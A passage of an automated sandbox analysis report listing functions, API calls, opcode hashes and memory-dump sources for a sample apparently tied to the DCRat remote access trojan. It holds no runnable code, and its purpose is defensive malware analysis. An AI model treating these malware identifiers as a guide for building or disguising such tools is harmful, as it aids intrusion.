                                      • Opcode ID: 434fc68384e1a05e0b792e7d631b9b23bcfc6ca0284c245dc735ff4e6d23c3d5
                                      • Instruction ID: 62c50a248f5a88ac5ad4e3d10efab4b30d39b6e11e8f2c8f4c9ad7f7d976d0c3
                                      • Opcode Fuzzy Hash: 434fc68384e1a05e0b792e7d631b9b23bcfc6ca0284c245dc735ff4e6d23c3d5
                                      • Instruction Fuzzy Hash: B7D02E7190812026CA002B24EC0ADAF79068F02330F200324FA38A52F6CE2409A0B2EA
                                      Function 00F0DA4E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetModuleHandleW.KERNEL32(00000000,?,00F0D32F,?), ref: 00F0DA53
                                      • FindResourceW.KERNEL32(00000000,RTL,00000005,?,00F0D32F,?), ref: 00F0DA61
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: FindHandleModuleResource
                                      • String ID: RTL
                                      • API String ID: 3537982541-834975271
                                      • Opcode ID: 2f0af543807eba6c817a1d6ba126b6b390d92b931ffb4eb0b9e60e555cfa3634
                                      • Instruction ID: 464f57d0c8e006c0522afc4d940d2a08eac1a9d05c3bb4c3d9193654c0b0ee38
                                      • Opcode Fuzzy Hash: 2f0af543807eba6c817a1d6ba126b6b390d92b931ffb4eb0b9e60e555cfa3634
                                      • Instruction Fuzzy Hash: B2C01271785350B6D73457607D0DB433A495B10F36F05044CB141DE1D0D5E9C940A650

                                      Executed Functions

                                      Function 00007FF886EA3545 Relevance: 1.5, Strings: 1, Instructions: 272COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1403961070.00007FF886EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EA0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_7ff886ea0000_providerreviewdhcp.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: Z_H
                                      • API String ID: 0-256909865
                                      • Opcode ID: 5da29f7da3b5b916c532c69acc4c9021d692c40d67b3a2df7891f399d79e534e
                                      • Instruction ID: ac4d6d19d085f774ac4a1575273fea60f686985f508d46a04ac51d1a61c9c47b
                                      • Opcode Fuzzy Hash: 5da29f7da3b5b916c532c69acc4c9021d692c40d67b3a2df7891f399d79e534e
                                      • Instruction Fuzzy Hash: 6791A071E289498FE794DB68D8543E9BBE1FBAA350F54017AC00ED72C6DF685805CB42
                                      Function 00007FF886EA0515 Relevance: .4, Instructions: 387COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1403961070.00007FF886EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EA0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_7ff886ea0000_providerreviewdhcp.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 71d1f59bb53a9005486e23d73f6ec6030f5646df1d843e5b24fb73bc82267844
                                      • Instruction ID: eb0ac09361856b8ac7251036d0888e071968b081a5ece28cbfc3434c998eef2c
                                      • Opcode Fuzzy Hash: 71d1f59bb53a9005486e23d73f6ec6030f5646df1d843e5b24fb73bc82267844
                                      • Instruction Fuzzy Hash: 93B1F653D0D1D25FF311A6FCBC591FA2F90FF622A9B1881B7E08C8A0D7DD18984AC295
                                      Function 00007FF886EA05A0 Relevance: .3, Instructions: 315COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1403961070.00007FF886EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EA0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_7ff886ea0000_providerreviewdhcp.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 107c205027540b78b676173f747aa105e9755f5a67c37b6bc63b08e0dfe30453
                                      • Instruction ID: 3611330acd53cc531fba9b3bbcfd754a572fff7577bfd0d7dfd313bd51a0b639
                                      • Opcode Fuzzy Hash: 107c205027540b78b676173f747aa105e9755f5a67c37b6bc63b08e0dfe30453
                                      • Instruction Fuzzy Hash: 2A91F752D0D5D24FF31166FCBC591FA2F90FF626A9B1881B7E0888A0D7DD189C4AC295
                                      Function 00007FF886EA05ED Relevance: .3, Instructions: 305COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1403961070.00007FF886EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EA0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_7ff886ea0000_providerreviewdhcp.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 976a335146934cfa3a75df84aa362799c85d0154135cdda99766557dddff2a8b
                                      • Instruction ID: a545eed84f7fe41af29715fcc0a78c179c90113ef319af84a0e7bb50f08b63ae
                                      • Opcode Fuzzy Hash: 976a335146934cfa3a75df84aa362799c85d0154135cdda99766557dddff2a8b
                                      • Instruction Fuzzy Hash: 9E910552D0D5C15FF31166BCBC591FA2FD0FF626A9B1882F7E0888A0D7DD189C4AC295
                                      Function 00007FF886EA16B8 Relevance: .3, Instructions: 285COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1403961070.00007FF886EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EA0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_7ff886ea0000_providerreviewdhcp.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: e4eec963da222dfba1a54b0647f9f4f7e72bfabbb7a313d9aa570d0e2c09d24c
                                      • Instruction ID: 4b04ee1d8f74e63c007a74c961780cb35e399d5f49a5686adbbf7ba7db27d773
                                      • Opcode Fuzzy Hash: e4eec963da222dfba1a54b0647f9f4f7e72bfabbb7a313d9aa570d0e2c09d24c
                                      • Instruction Fuzzy Hash: E481B031A1CA494FDB58DE1C98556B977E2FFA8746F24417EE44EC3282DE34AC02C781
                                      Function 00007FF886EA0640 Relevance: .3, Instructions: 266COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1403961070.00007FF886EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EA0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_7ff886ea0000_providerreviewdhcp.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b3ea4bc2a344dbc469682a2e7f668422146a639a257fc788ad6aa9bc27c3ce31
                                      • Instruction ID: 5cafa6d1116da569201eb955a7b620d6d3547465cba7565a98032cfd85f28ac5
                                      • Opcode Fuzzy Hash: b3ea4bc2a344dbc469682a2e7f668422146a639a257fc788ad6aa9bc27c3ce31
                                      • Instruction Fuzzy Hash: 7F71F552D0D5C14FF31566B8BC192FA2FD0FF626A9B1882F7E0898A0D7DD189C4AC295
                                      Function 00007FF886EA0638 Relevance: .2, Instructions: 189COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1403961070.00007FF886EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EA0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_7ff886ea0000_providerreviewdhcp.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: f0ce50507c02738454f38229ff781522d6bba95fabfdac82b6f2c028712c11d4
                                      • Instruction ID: 2814af7d0d7fa2a38442ec08e0e011b2c592fee0f3a0ec01b3dc08ab3bee3b6b
                                      • Opcode Fuzzy Hash: f0ce50507c02738454f38229ff781522d6bba95fabfdac82b6f2c028712c11d4
                                      • Instruction Fuzzy Hash: B1511822D0D5814FF311A6B8A8591E93FE0FF613A9F1841F7D088CA0D7DD289849C395
                                      Function 00007FF886EA1CED Relevance: .2, Instructions: 188COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1403961070.00007FF886EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EA0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_7ff886ea0000_providerreviewdhcp.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 9075c36b3cc8c75449dce7dd6175e1af7d3aaecb4fe54801ba14dbdd33e71efa
                                      • Instruction ID: 8b253a49b258b2851d2c31b163771f37ba0c517c69d2b4a2024a7b1341103f39
                                      • Opcode Fuzzy Hash: 9075c36b3cc8c75449dce7dd6175e1af7d3aaecb4fe54801ba14dbdd33e71efa
                                      • Instruction Fuzzy Hash: C251A031A18B894FDB58DE1888556BA77E2FFA8752B24457ED45EC7281CE34EC02CB81
                                      Function 00007FF886EA31A5 Relevance: .1, Instructions: 146COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1403961070.00007FF886EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EA0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_7ff886ea0000_providerreviewdhcp.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 25bdfac012886655f9ea523680c71056ab8e0df7be2576162737616461c4bc61
                                      • Instruction ID: dcd419688f54eedb9806ab7e2dd90e246a1ff9e13d541ba551b99704615c4411
                                      • Opcode Fuzzy Hash: 25bdfac012886655f9ea523680c71056ab8e0df7be2576162737616461c4bc61
                                      • Instruction Fuzzy Hash: E1512770D0861D8FEB54DF98C5956EDBBF1FF69351F60007AD009E7291DA38A844CB51
                                      Function 00007FF886EA0488 Relevance: .1, Instructions: 89COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1403961070.00007FF886EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EA0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_7ff886ea0000_providerreviewdhcp.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 9cc311c32182a651d0a033f0313b88ac21b87312c1f5c5300a689925d59245e0
                                      • Instruction ID: 6a40cc8a6127dad70e08fe69da96095a5a28bda20907ac62f34e62289214a0e3
                                      • Opcode Fuzzy Hash: 9cc311c32182a651d0a033f0313b88ac21b87312c1f5c5300a689925d59245e0
                                      • Instruction Fuzzy Hash: 5B21C72290D1925FE211FBACFCE61EA3F54DF5227971941B7D0CC89093DE0C644A96A5
                                      Function 00007FF886EA0805 Relevance: .1, Instructions: 87COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1403961070.00007FF886EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EA0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_7ff886ea0000_providerreviewdhcp.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 8f071f8a44a07256fc8f4927a835d77d24f97e85ab3899b2f5a0751648a49c37
                                      • Instruction ID: d6f9eb092f26bcbdeb37e12987ff14bf43e0a40c92a6da823c1c2fd8713e1278
                                      • Opcode Fuzzy Hash: 8f071f8a44a07256fc8f4927a835d77d24f97e85ab3899b2f5a0751648a49c37
                                      • Instruction Fuzzy Hash: 10215E62E1D2429FE711667CDC5E2E97B90FF21369F0801B7D44CC9083EE189856C2D5
                                      Function 00007FF886EA2189 Relevance: .1, Instructions: 76COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1403961070.00007FF886EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EA0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_7ff886ea0000_providerreviewdhcp.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: a13bae3e181a7a865c39fbf43492eb17e462b6f8235608ab87add793caa34a0a
                                      • Instruction ID: f5c06b5d27244fe6b863492b01e81b7fb9a023965ac20f98255fe810e3da81e0
                                      • Opcode Fuzzy Hash: a13bae3e181a7a865c39fbf43492eb17e462b6f8235608ab87add793caa34a0a
                                      • Instruction Fuzzy Hash: 2311DF30D1C54A8EE745AB74851A6B87BE0FF66381F1404B6D00DC7493DE28A889C352
                                      Function 00007FF886EA339F Relevance: .1, Instructions: 69COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1403961070.00007FF886EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EA0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_7ff886ea0000_providerreviewdhcp.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 427d18ece24ec786568d511da1b57aca32f2d8dbd21937c3802792b78a34cff9
                                      • Instruction ID: b81f7f1181ae1a326bd98c2585e23bfcdd2949e9883b50a2e58d9069fd0fe24a
                                      • Opcode Fuzzy Hash: 427d18ece24ec786568d511da1b57aca32f2d8dbd21937c3802792b78a34cff9
                                      • Instruction Fuzzy Hash: 5D219F3094D69A8FD742EB7488586E97FF0FF5A351F1904F6D458CB0A2DA2C984AC711
                                      Function 00007FF886EA0A01 Relevance: .1, Instructions: 68COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1403961070.00007FF886EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EA0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_7ff886ea0000_providerreviewdhcp.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 3d2bbef132cad130c741f6db49edfa3301bcc15a5a9094744739d9a7f6c2c0e3
                                      • Instruction ID: 1c15b12a82fe9fb2606915934e159647b8f6cff4087ada61f14f177af41f2ff8
                                      • Opcode Fuzzy Hash: 3d2bbef132cad130c741f6db49edfa3301bcc15a5a9094744739d9a7f6c2c0e3
                                      • Instruction Fuzzy Hash: EA119A30D1850E9EE790EBA8C8492BA7BE1FF68385F5005B6C009C7192EE38A844C740
                                      Function 00007FF886EA112D Relevance: .1, Instructions: 61COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1403961070.00007FF886EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EA0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_7ff886ea0000_providerreviewdhcp.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 3623807010fbd90489a0fb1797bc92ab9c06ad8951c6916287e65a15af9a9367
                                      • Instruction ID: 001a85e032f8ad8acb6e61b0e75522932de3c21bcb8492222db26d79cbd6ccd3
                                      • Opcode Fuzzy Hash: 3623807010fbd90489a0fb1797bc92ab9c06ad8951c6916287e65a15af9a9367
                                      • Instruction Fuzzy Hash: F511D070D0864A8EEB999B6884582FA7BE0FF79341F1000BAC00AC61C2DA295844C741
                                      Function 00007FF886EA0F58 Relevance: .1, Instructions: 55COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1403961070.00007FF886EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EA0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_7ff886ea0000_providerreviewdhcp.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 74dd3d0f61f1b6fbc4cbaf685870f3b9fe210d2b0191b7e20a4a23e9f5e803f5
                                      • Instruction ID: f4bfaba38a8a1deb9d84ddfea055e9c8b8a7abbcbd6e458f7a3d07b340c20db0
                                      • Opcode Fuzzy Hash: 74dd3d0f61f1b6fbc4cbaf685870f3b9fe210d2b0191b7e20a4a23e9f5e803f5
                                      • Instruction Fuzzy Hash: 2C11A334D18A0A8FFB54EB64C955BEDB7A1FF64345F300279C00AA7196CE386C42CB84
                                      Function 00007FF886EA34C5 Relevance: .1, Instructions: 54COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1403961070.00007FF886EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EA0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_7ff886ea0000_providerreviewdhcp.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: c018dfb4aebad11bb5154d8e698333a1e491e4fd15658f47a7626c7148fc4c51
                                      • Instruction ID: ce75d4737036e5341f4c001a6c2aa77af9744272461907df1baa1319ab4418ab
                                      • Opcode Fuzzy Hash: c018dfb4aebad11bb5154d8e698333a1e491e4fd15658f47a7626c7148fc4c51
                                      • Instruction Fuzzy Hash: 6C118E7091868E8FDB99EF68C4596BD7BF0FF28341F1004BED419C7192DA35A940C701
                                      Function 00007FF886EA2E31 Relevance: .1, Instructions: 52COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1403961070.00007FF886EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EA0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_7ff886ea0000_providerreviewdhcp.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: db9f8d5ee421d4b057290e010586cbcaa40b9e53714d3441c9c6fff576d9a2a4
                                      • Instruction ID: 0d4fd4d6f2d2923c8fce01a59e0f336171bb3e09ad09718c5a0eb6779fe8ae33
                                      • Opcode Fuzzy Hash: db9f8d5ee421d4b057290e010586cbcaa40b9e53714d3441c9c6fff576d9a2a4
                                      • Instruction Fuzzy Hash: 19018431D1C64D9FE752EB748549AA97BE0FF29341F1545B6D408C70A2EA38E884C741
                                      Function 00007FF886EA05D8 Relevance: .0, Instructions: 50COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1403961070.00007FF886EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EA0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_7ff886ea0000_providerreviewdhcp.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 850ce9929ccf56fefdc4c129e859d7f5f3beebf7b89425ac28511b718357dab4
                                      • Instruction ID: 7512b0c45a14e104225421fccdf91ded8a180b24db3488940a83e96e64280c08
                                      • Opcode Fuzzy Hash: 850ce9929ccf56fefdc4c129e859d7f5f3beebf7b89425ac28511b718357dab4
                                      • Instruction Fuzzy Hash: 41019E3090890E9FEB89EF24C1556FA77A2FF68345F60057ED40EC7290CA35A950CB40
                                      Function 00007FF886EA2EA9 Relevance: .0, Instructions: 45COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1403961070.00007FF886EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EA0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_7ff886ea0000_providerreviewdhcp.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: c479a8da7e2e3c763802cb968804c9e854cc80b1dab48c19cd1259e0e03f32dc
                                      • Instruction ID: 7e016699ba237ec6d6a00524f52506544023ea36c9291319195f53d2a43e6b71
                                      • Opcode Fuzzy Hash: c479a8da7e2e3c763802cb968804c9e854cc80b1dab48c19cd1259e0e03f32dc
                                      • Instruction Fuzzy Hash: 8001F731D1C2894FE742EB34895A9A97FF0FF19341F1A49F7D408DB0A2EA38A884C701
                                      Function 00007FF886EA280D Relevance: .0, Instructions: 45COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1403961070.00007FF886EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EA0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_7ff886ea0000_providerreviewdhcp.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 5e306a13efc3603769adc3aae5df03bc02c65c18e7d93fbdb816dcce003d52e4
                                      • Instruction ID: d49738b45d5e853355ee4f9c43bea187f6aa9cc8915570ba05f23fe6ea676721
                                      • Opcode Fuzzy Hash: 5e306a13efc3603769adc3aae5df03bc02c65c18e7d93fbdb816dcce003d52e4
                                      • Instruction Fuzzy Hash: 49018F30D1864D8FE791EB28854A6E97BE0FF69341F5545B6E408C70A2EE38E984C741
                                      Function 00007FF886EA1C6D Relevance: .0, Instructions: 42COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1403961070.00007FF886EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EA0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_7ff886ea0000_providerreviewdhcp.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 85e599c5ed5ab79aaf7b927305cbd749eda7319e73d5e103741bf1ab02d9b6ad
                                      • Instruction ID: 665a5c85dd2532620ecf56bf1da0eee2c806f4aeb3aef34d5b676a30ced45833
                                      • Opcode Fuzzy Hash: 85e599c5ed5ab79aaf7b927305cbd749eda7319e73d5e103741bf1ab02d9b6ad
                                      • Instruction Fuzzy Hash: AE01813090964D8FEB99DE2484556FA7BA1FF65341F64017AD808CB191DA79D950C780
                                      Function 00007FF886EA0610 Relevance: .0, Instructions: 42COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1403961070.00007FF886EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EA0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_7ff886ea0000_providerreviewdhcp.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 127f7e11860f37b81aae69cb7f404da052456a60ed01a274190d53d196b9a5d5
                                      • Instruction ID: 46c069b230807f99b986ce42892d0e6afa7ada1bd728e48a2b8598d6698f71a5
                                      • Opcode Fuzzy Hash: 127f7e11860f37b81aae69cb7f404da052456a60ed01a274190d53d196b9a5d5
                                      • Instruction Fuzzy Hash: 8001813091850E9FEB58EB64C459AB977E0FF28346F24087EE41ED21D1DE39AA90CA01
                                      Function 00007FF886EA0608 Relevance: .0, Instructions: 42COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1403961070.00007FF886EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EA0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_7ff886ea0000_providerreviewdhcp.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 629079797a4abec0359dda759b34fa22d673939a10fa60a49f5b223a2718c5ca
                                      • Instruction ID: 33d8d101cc266ba5229b7926292b7c5c3d77a07dd35e1e9f8f8c9260da4c3547
                                      • Opcode Fuzzy Hash: 629079797a4abec0359dda759b34fa22d673939a10fa60a49f5b223a2718c5ca
                                      • Instruction Fuzzy Hash: 2F01A43091450E9FEB58EF64C5596B973A0FF28345F6008BEE40ED61D1DF39AA90C701
                                      Function 00007FF886EA1140 Relevance: .0, Instructions: 41COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1403961070.00007FF886EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EA0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_7ff886ea0000_providerreviewdhcp.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 6bd1741b0e40920edc80884cb8052b51f226028466a6093058e0e4673cf1a09d
                                      • Instruction ID: 3674400f6b0b3173fe6292a6190d52aa027820ba05a770334871fed070103f48
                                      • Opcode Fuzzy Hash: 6bd1741b0e40920edc80884cb8052b51f226028466a6093058e0e4673cf1a09d
                                      • Instruction Fuzzy Hash: A0F0FF70D1C61E8EFB989B6899483FA77E4FF75396F10017AE41AC21C1EE281858C241
                                      Function 00007FF886EA05D0 Relevance: .0, Instructions: 39COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1403961070.00007FF886EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EA0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_7ff886ea0000_providerreviewdhcp.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: bc29a898e522961413d00784ab59b1d7f755d5ad73b05d3ada038132c3e2370c
                                      • Instruction ID: d0e9261db1f22387563b9d7858d255073e68fcaba0f1e5c5ed020081049a96f9
                                      • Opcode Fuzzy Hash: bc29a898e522961413d00784ab59b1d7f755d5ad73b05d3ada038132c3e2370c
                                      • Instruction Fuzzy Hash: 88F0F03081960E8FEB89EF2495452FA37A1FF65345F60053AE80DC7181CB39E9A0CB81
                                      Function 00007FF886EA2729 Relevance: .0, Instructions: 35COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1403961070.00007FF886EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EA0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_7ff886ea0000_providerreviewdhcp.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 5f105761e33b6cfa6d13f799b90f19d8ee535577618fe65eeca2d7fefbefcf01
                                      • Instruction ID: c2ed4ef824951203c6b39f44cd5e0eb1be7dafd63e047ac64131a5edc3c74ffc
                                      • Opcode Fuzzy Hash: 5f105761e33b6cfa6d13f799b90f19d8ee535577618fe65eeca2d7fefbefcf01
                                      • Instruction Fuzzy Hash: 66F0F631C0D38A8FEB599F3489692E93B70FF16341F4904FAE809CA0D2DB38A954C742
                                      Function 00007FF886EA279D Relevance: .0, Instructions: 31COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1403961070.00007FF886EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EA0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_7ff886ea0000_providerreviewdhcp.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: effb7f8f7a6c8f97eda32cee6fddd75f714d361a2726c8c74e7bd9ff5c20a410
                                      • Instruction ID: 7c0232b097888a0f0a03ee97c2e9e44aa55fda265c702e13a17432bcad3791fd
                                      • Opcode Fuzzy Hash: effb7f8f7a6c8f97eda32cee6fddd75f714d361a2726c8c74e7bd9ff5c20a410
                                      • Instruction Fuzzy Hash: 31F02B3081D78A4FE7589F2484166F93BE0FF15315F0804BEE409C60D2DF399950C701
                                      Function 00007FF886EA23CE Relevance: .0, Instructions: 22COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1403961070.00007FF886EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EA0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_7ff886ea0000_providerreviewdhcp.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 34f51b4e931255b8e8f405a01ab11ad91d7b836dd6515934a5e5c302054a0cca
                                      • Instruction ID: afead5f2cef0083621d97706bdcf22745cb9a17fbc88e55ac68b1eb5ae718d3a
                                      • Opcode Fuzzy Hash: 34f51b4e931255b8e8f405a01ab11ad91d7b836dd6515934a5e5c302054a0cca
                                      • Instruction Fuzzy Hash: 8CF01C3090851ACEEB54EB10C855BE973A0FB61346F1005B9C04ED3291CE782E88CB40

                                      Executed Functions

                                      Function 00007FF886EC9758 Relevance: .1, Instructions: 131COMMON
                                      Download Yara Rule
                                      Memory Dump Source
